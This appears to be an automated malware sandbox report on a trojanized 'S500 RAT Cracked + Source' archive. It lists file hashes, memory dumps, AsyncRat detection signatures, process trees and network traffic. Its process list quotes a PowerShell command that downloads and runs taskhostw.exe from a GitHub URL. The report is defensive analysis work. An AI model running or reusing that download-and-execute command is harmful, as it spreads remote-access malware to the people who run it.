| SHA512 | abf6e26e0fabe614084f386afeccf2e1c73d6c7ca7702471a45592730f88028dd223cb4981b7ae5e6d91125999a258b421d8ef35549354f5ddc96bb510cfa127 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleThumbnails.cs
| MD5 | 04c8276b921996b82ea3e4dcb46a6903 |
| SHA1 | fb3852b13f015051838aa5442e6b7ef412dc0bf0 |
| SHA256 | f804baaac0fa4c7706b83f70a877f8b8998bac11ca1cf35f01ed62d3bcb3751c |
| SHA512 | 8317e7b79d90762607af931af202c7dd70223adb723c03573f4ea67c06236ed4f148d7b1a07e8ad1df5cb5bf7dba4f8a3bb1d7104032f652b5b7ab65b88c7ab0 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleRemoteDesktop.cs
| MD5 | 8dee4aae3ab14cb9c2edcd638c74bbd8 |
| SHA1 | 11eb87079623c7f98513487dff071be2c4c13cd0 |
| SHA256 | 01b1270f336c44160a2137d0c8bac252abb21d69280592a964202a6853a87813 |
| SHA512 | 78080cbb205695493c94c42c06bb875827420fee3a8f1d1090082fa293ec1d4fa9ce85cd82bdd401c6d54229f37ec615804c2ac5f52eea1668d8fd412931eb90 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleRecovery.cs
| MD5 | e93d4932ba858f6a61f67c9a62bd72e3 |
| SHA1 | a84a131f2fca55c987a6f10a8530431902227391 |
| SHA256 | db63133ff98e2a34a82bbe6a6cb797f83379be1b0cb8546b8332ba8accd32e08 |
| SHA512 | a3635926cb344f6bfbfc1837acd252f362c4a3712cae556b5f5248a64f7d706e6ace0de71baa425f801f42ec4959c41a5ebfacb697bbc2b4e4308b28c2a3d23c |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandlePassword.cs
| MD5 | 25d0a72cfb2520e7e92347c8016d1fed |
| SHA1 | c50a25e97f9e4ffa1f3a357866b751c2ec1aa0a5 |
| SHA256 | 2f60396bd4fd1235f701600dde55c355114fe4d6ad3b59a9a26615feb9b824f8 |
| SHA512 | 630f804e83c3b8a9b826790e5327344e1a5881abf5a31440f87aaa3a95616e5ada3ee4ef6997cb80881b57e2e8450bdea236871d0a1ad31d28bc7f8d36028900 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleNetstat.cs
| MD5 | 8f8786d6be266aab63c51a361cb1890c |
| SHA1 | b8630833c93c17fc6a6f62e1bced0da122ed1fbd |
| SHA256 | 3c4b983c453466ddca8f3a6a909680b5c4b4505b1a6e40e9c1b7fd2e82a62101 |
| SHA512 | d40b4bb708765065ab0a35a86e13574723e473f020804e30eea90cc00fd5676ff0c797d3aff61d94f2b158c660dbba0346590ab01d3c6173d4518b489083cbe7 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleMiner.cs
| MD5 | 060dc8b25c808fef52c6aae610d22bc8 |
| SHA1 | 484ebd1f52152840b4f0945838b90ade3984d3f2 |
| SHA256 | 5d45c4ea68475e71fb1ac0c0c160d25aa887cbf355eac265ce36f742881aafa5 |
| SHA512 | 06d25becfcce01b37aef3dcd4a9000f08a62bef2b65ab9aa6636196933caadd818521ed30417ed9d2f092abbeae073d5acd129837e70e78817c7b1fc0a26734f |
C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleLogs.cs
| MD5 | d85ffc7dc4a70e49867cb4506c892eb0 |
| SHA1 | ee660a91ef1c697952145740181e88e51c51f564 |
| SHA256 | df6baead08beeeae2101989ca93dd0dfb1eec6d5b1ea76386e44f275faa75a59 |
| SHA512 | e1b7fcfd74eeb4259fa1f449b93debe74ce38c8970bdcfc5ccb0de82e3d532b11e861bb59482d6872f9dfbcf427b8d16e441d23e3e13301e8f3d9790434e80a5 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Helpers\Compiler.cs
| MD5 | 9a053c7a21cf1dee3cecc32e7ee9b551 |
| SHA1 | c42383a966016cd83f58837a811425a16dd01df3 |
| SHA256 | 9e916b8c881168e511aaaea904660879b8b77c20a0552ff9208edd22c1a86253 |
| SHA512 | cc558e54ca3cf08371aef075afde570c8cd0b9dd1af24e5dfc0a28af33a9c0d90f440a24f803bcce337fc2e444a3f92221293a7abdca1b6306fe7eaaf3a53900 |
C:\Users\Admin\Desktop\S500 RAT Source Code\Helpers\ListViewColumnSorter.cs
| MD5 | bae01e7821ec5afd7ff51fbe94baf083 |
| SHA1 | 72d7846e5ef290231a45b6b51ef61fb27ce4fcf2 |
| SHA256 | 8e5186d60147f8a722fcf28b7e1b91b00d082d32401c189eae2c93343bc2e554 |
| SHA512 | bca3bd26f5bf05bdbe6e4714e10bff31af8be89f7240e7835d2c3c4f4381134ad13f17aa0eb7c20f1cc47c48c9de47ae47f36d7ba1010a7bd1406ed9ae27b86c |
C:\Users\Admin\Desktop\S500 RAT Source Code\Helpers\FileInfo.cs
| MD5 | 2f9d9b634b11fb6f2c5b6b1842d1006f |
| SHA1 | d3d66d515ffe1c18fa4af2017df62712f5ffc03b |
| SHA256 | 9ad63e3ba242bd5aa970c8255227a7eac600d6f46110b64f51685c98b138010a |
| SHA512 | 3f6598f5b9b335f61785d5e18f484c223a516a36167d161f94068fcc4df03b7ae56f20c5e8a543f940ed97019564a84426197836ec15a20910262c5f8c6b6de5 |
C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\S500 RAT Source Code\Resources\tomem.png
| MD5 | 4aa22d0e14ae3ab96820b5fe3b29c24b |
| SHA1 | 92474fa98104670a4d73753b0ce0c3243b0fc751 |
| SHA256 | 09dad12ed97724088278d93d71e703a617ea062f5dfecd464f91130bc056b5ec |
| SHA512 | 90c8295d577eb573b23f6b809f18f2a22fb8bb6a49ad2c2c2c4ad87a3ce922ee263f5a0bc000b119fe61b4cb49e86bdb8ea01a94ed9647329cc14fadc5c86d7c |
C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Browsers\Firefox\Bookmarks.txt
| MD5 | 2e9d094dda5cdc3ce6519f75943a4ff4 |
| SHA1 | 5d989b4ac8b699781681fe75ed9ef98191a5096c |
| SHA256 | c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142 |
| SHA512 | d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7 |
memory/2028-1517-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/2028-1518-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/2028-1506-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/1360-1569-0x0000000002020000-0x0000000002060000-memory.dmp
memory/2192-1573-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/2028-1574-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/2192-1575-0x000000001BD90000-0x000000001BE10000-memory.dmp
memory/2028-1576-0x000000001C350000-0x000000001C3D0000-memory.dmp
memory/1360-1577-0x0000000002020000-0x0000000002060000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab3AD8.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
C:\Users\Admin\AppData\Local\Temp\Tar3DAC.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\msgid.dat
| MD5 | cfcd208495d565ef66e7dff9f98764da |
| SHA1 | b6589fc6ab0dc82cf12099d1c2d40ab994e8410c |
| SHA256 | 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 |
| SHA512 | 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99 |
memory/2192-1676-0x000007FEF5940000-0x000007FEF632C000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-20 17:22
Reported
2024-03-20 17:47
Platform
win10-20240221-en
Max time kernel
1310s
Max time network
1217s
Command Line
Signatures
AsyncRat
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\Stub.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000\Software\Microsoft\Internet Explorer\TypedURLs | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings | C:\Program Files\7-Zip\7zFM.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\S500 RAT Cracked\Readme.txt
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe
"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CCA6.tmp\CCA7.tmp\CCA8.bat "C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe""
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
ServerRegistrationManager.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Resources\stub.txt
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-WebRequest 'https://github.com/CVE-TEAMDSNH-20230611/20230611VNM/raw/main/taskhostw.exe' -OutFile taskhostw.exe"
C:\Windows\system32\taskhostw.exe
taskhostw.exe
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe
"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D2CD.tmp\D2CE.tmp\D2CF.bat "C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe""
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
ServerRegistrationManager.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO831A2C0C\Stub.txt
C:\Users\Admin\Desktop\Stub.exe
"C:\Users\Admin\Desktop\Stub.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | 4.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.134.221.88.in-addr.arpa | udp |
Files
C:\Users\Admin\Desktop\S500 RAT Cracked\Readme.txt
| MD5 | 531208ea558a68c95339bea9517845c3 |
| SHA1 | 95865bbeb196cf007626c92cdef1524c9b16dc5a |
| SHA256 | dbceb36fa695bfe2bd706b22cb690976a3df77a46ec97d9188a3875308044b3a |
| SHA512 | 46f04b05cd14d80bef69325802464d190856af9f2844312f84263baf00eb14d3ca58d647fed8fcc5de0106883ec3f2546fed8b58ca09464fd6a336e7dece66f3 |
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe
| MD5 | 5b52658c4517684971de10a6b7a67c30 |
| SHA1 | f0820c52617ebacaf53d8b8d97f1a42c712888bd |
| SHA256 | 3ec85206a8c5d584c2cf4ab575bdd5cf4b29ed3a896032a1adc37f1c08507b31 |
| SHA512 | ce96d25cfbb0d2c4addf242aa05c05909d7a883a70881df8336498b16913ec21bd64c07519eba89b2da90a05902fd7618e172a7602b985153eac09d9f226c8d6 |
memory/1800-233-0x0000000000400000-0x0000000000439000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CCA6.tmp\CCA7.tmp\CCA8.bat
| MD5 | fc4af7384f0b6f274dd3e745f0aceeaa |
| SHA1 | 31b310f869b15b84e52ef282cabaee974e5043cf |
| SHA256 | f27a781bd4e8788990ceecac17ba4b9642e15f0d311e17d62c70db694c207a34 |
| SHA512 | dc7b542d89236105c8b8976e5af0e9e557eaa919adb2e8384b55b70c0b5bc6f00d2010538b9abaca90bb797d24fd509acdc1b3a6beea27f11405bf198349f57f |
C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
| MD5 | aa2fc72b58059e5e7e9e7003ab466322 |
| SHA1 | e171576589134431baccb40d308e7dcbc776e087 |
| SHA256 | f107c0f275bd1c773e1ff2d78b60a4060b8353b02f45d3892968206fedffdf88 |
| SHA512 | 26d69ad0d3f41bf08585307595e1d670c7d7905e1f86a566a36d9b0c836d3b349a6349e1f2885d433d35bd111f95ce004ae34e81443f96b73e784db3594e3eef |
memory/1512-239-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp
memory/1512-240-0x000001E280000000-0x000001E2810C4000-memory.dmp
memory/1512-241-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\Guna.UI2.dll
| MD5 | 0f07705bd42d86d77dab085c42775244 |
| SHA1 | 7e4b5c367183f4753a8d610e353c458c3def3888 |
| SHA256 | cf9b66e11506fa431849350c0cb58430a71e5ec943d2db9ef1b2e2302f299443 |
| SHA512 | 851b1a4c470ee7fe07ce5619c16fd391428585926c5b559694a9e445633ea51ec86c74a3bbf3bce39d943c4bf714dad2fd3c4a4d0703be2333541c79a2ee97f0 |
memory/1512-243-0x000001E29B2D0000-0x000001E29B4C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\c6ef4c2b-9a55-40b4-957b-c3cb74191397\GunaDotNetRT64.dll
| MD5 | 9c43f77cb7cff27cb47ed67babe3eda5 |
| SHA1 | b0400cf68249369d21de86bd26bb84ccffd47c43 |
| SHA256 | f25b9288fe370dcfcb4823fb4e44ab88c7f5fce6e137d0dba389a3dba07d621e |
| SHA512 | cde6fb6cf8db6f9746e69e6c10214e60b3646700d70b49668a2a792e309714dd2d4c5a5241977a833a95fcde8318abcc89eb9968a5039a0b75726bbfa27125a7 |
memory/1512-252-0x00007FFC4BDB0000-0x00007FFC4BEDC000-memory.dmp
memory/1512-251-0x00007FFC5EF50000-0x00007FFC5EF77000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.dll
| MD5 | af527b22b92a23c38a492c5961cf2643 |
| SHA1 | 15106adfa13415287b3e9d8deba21df53cb92eda |
| SHA256 | 4208c9293c5684d2fc3c8f5a269a1120adee32fbd2766bbb73410aab2d491b7a |
| SHA512 | 543cce9b5e4c9558bf0bd0da9d6af8c1ad2f7d62e2d65a9aa4e3af9e4840ce6fb6bbe8952bd20f6f1e3a6d3b5e5e5b3417a60b6d955bfa4e23a653262677b49c |
memory/1512-254-0x000001E29B910000-0x000001E29BB50000-memory.dmp
memory/1512-255-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1512-256-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1512-257-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1512-258-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1512-259-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1512-260-0x000001E29B8D0000-0x000001E29B902000-memory.dmp
memory/1512-261-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1800-262-0x0000000000400000-0x0000000000439000-memory.dmp
memory/1512-263-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp
memory/1512-264-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\initialization.dll
| MD5 | 3aaae3cec15b86693ae9fb8e1507c872 |
| SHA1 | ed8d0a139c609eb886482718ec2ecf96cbbe8c84 |
| SHA256 | a027b6b344e5a637bc8377fe58166273d2b76e92ff8c66bd505d46c21fe3b21b |
| SHA512 | 407558e01ade1832bb021b5af0209e7a6bef98ab35b9f4723a1add48362bd13f566697a8fb41af48c0bb15ca13585f9c09ac8d5da0feb322798c778b09cf4463 |
memory/1512-266-0x000001E2A1F90000-0x000001E2A1F9C000-memory.dmp
memory/1512-267-0x000001E2A1FC0000-0x000001E2A1FD2000-memory.dmp
memory/1512-268-0x000001E2A1CA0000-0x000001E2A1CAA000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\Certificate\ServerCertificate.p12
| MD5 | c60e527a85f285ddc66c2fcf160b1be7 |
| SHA1 | abcf2b6bffea9f0f30190783f6eae2434ef7a9a8 |
| SHA256 | 35c46a9e9dc60a74a25572e743794a31fecd08672813d349a39f2d13b01e789f |
| SHA512 | 77a661544c2d7f2d8b870cdd503b806aea6de3a2b5aee19327c05aeef137a1df3661d249219fe73e7a300189c732efeb5d2004226c6e429fa024f1d3b1dec84e |
C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.Common.dll
| MD5 | 17cbdd9e4cb0ede2fad8c08c05fdaa84 |
| SHA1 | 74bc0ea3e8bd64c6752b6c0adac1bfe2b313416c |
| SHA256 | d975bc4711655e6fd2361ae9b056c617051f616ced5b46ce7772255a85712441 |
| SHA512 | 1948c20585ecb9984cd9452a74bcb75e81c35ca37f0cf0e1d3f211ad71b9e40c215f4784af7803cec9baef9984f682a32817a85806aefad21830b13b6a0a6a4a |
memory/1512-273-0x000001E2A1D00000-0x000001E2A1D3C000-memory.dmp
memory/1512-274-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1512-275-0x00007FFC5EF50000-0x00007FFC5EF77000-memory.dmp
memory/1512-276-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1512-277-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1512-278-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1512-280-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1512-281-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1512-282-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1512-283-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp
memory/1512-287-0x000001E2A1D40000-0x000001E2A1E40000-memory.dmp
memory/1512-289-0x000001E2A1D40000-0x000001E2A1E40000-memory.dmp
memory/1512-290-0x000001E2A1D40000-0x000001E2A1E40000-memory.dmp
memory/1512-291-0x000001E2A1D40000-0x000001E2A1E40000-memory.dmp
C:\Users\Admin\Desktop\Resources\stub.txt
| MD5 | 3fc302b81fdf520e4d3a170fe3ed0f0d |
| SHA1 | 9d821cc04064add1192decb54c76fdc9c4ef5747 |
| SHA256 | da3ab74adcfac4c84c23b564d7923beb706f62eb279cc6d945ac163721457f32 |
| SHA512 | b71077bb6703454c437cfdba4be2e9b86dfc9e3bb63ac89eeb9be0746c4f0b6b9d4bd16f7d44da9df89ab543420320dcd521115ea776c77fe32825836a86a552 |
memory/1512-370-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp
memory/3136-372-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp
memory/3136-377-0x0000022916090000-0x00000229160A0000-memory.dmp
memory/3136-376-0x0000022916090000-0x00000229160A0000-memory.dmp
memory/3136-378-0x0000022916060000-0x0000022916082000-memory.dmp
memory/3136-381-0x000002292E4F0000-0x000002292E566000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1k21x3pv.pbi.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3136-396-0x0000022916090000-0x00000229160A0000-memory.dmp
memory/3136-403-0x000002292F1C0000-0x000002292F966000-memory.dmp
memory/3136-521-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp
memory/1800-522-0x0000000000400000-0x0000000000439000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe
| MD5 | 3c2de6bc2aad943c8ccfd2ae1d2db50d |
| SHA1 | 3c909af7b1e92472fec95641cfb0baa65d434886 |
| SHA256 | 27c469c1ab1ecb80bc4fd2d60966174cd973456d584e0aa836811e726550d53d |
| SHA512 | 37a0c33b12cdaf1657f8080e2fe94ba7dc648e514f5ac779c3bb0a7938dfadfb6ee26db0204e10a194645da00883a7a4db2d04bd0850494ba2d12516c344000e |
C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
| MD5 | 295a148a835de7e9dcfd7b852631289a |
| SHA1 | 91981906fdf1f36c6f0a2a1243457409588379ae |
| SHA256 | 963bcb01e62f49a6a26320fd1d4c7ba1cc8883de6fb5478bdc1509b3da699e86 |
| SHA512 | 49363841c754d6ddee2c21668a389663065177c3bb97c827925e56c5957e60428bd33f82ce2666587f55cb5fdc15cb9e92708d4d8e2472706253a80e42239a5f |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ServerRegistrationManager.exe.log
| MD5 | fa931350508a2b855cce92719c4c207c |
| SHA1 | 3b6eb7b920d1c70b9f61b3745523b20828ecf21b |
| SHA256 | 1b6609def0e3a0533c446233db9438cdc1901a22acae76affbc4866e25595b0f |
| SHA512 | b85d45035b1e62df0c1032c796796f6e30dd03a992744d9a67e0b812b8e4e690b4acc19921931bdac5f0e0cb4d5ef54f2161da3aadc922fee27a3f49fad6a856 |
memory/1224-530-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp
memory/1224-531-0x0000016DAD830000-0x0000016DAD840000-memory.dmp
memory/1224-534-0x00007FFC64A30000-0x00007FFC64A57000-memory.dmp
memory/1224-535-0x00007FFC5D0C0000-0x00007FFC5D1EC000-memory.dmp
memory/1224-536-0x0000016DAD830000-0x0000016DAD840000-memory.dmp
memory/1224-537-0x0000016DAD830000-0x0000016DAD840000-memory.dmp
memory/1224-538-0x0000016DAD830000-0x0000016DAD840000-memory.dmp
memory/1224-540-0x0000016DAD830000-0x0000016DAD840000-memory.dmp
memory/1224-539-0x0000016DAD830000-0x0000016DAD840000-memory.dmp
memory/1224-541-0x0000016DAD830000-0x0000016DAD840000-memory.dmp
memory/224-542-0x0000000000400000-0x0000000000439000-memory.dmp
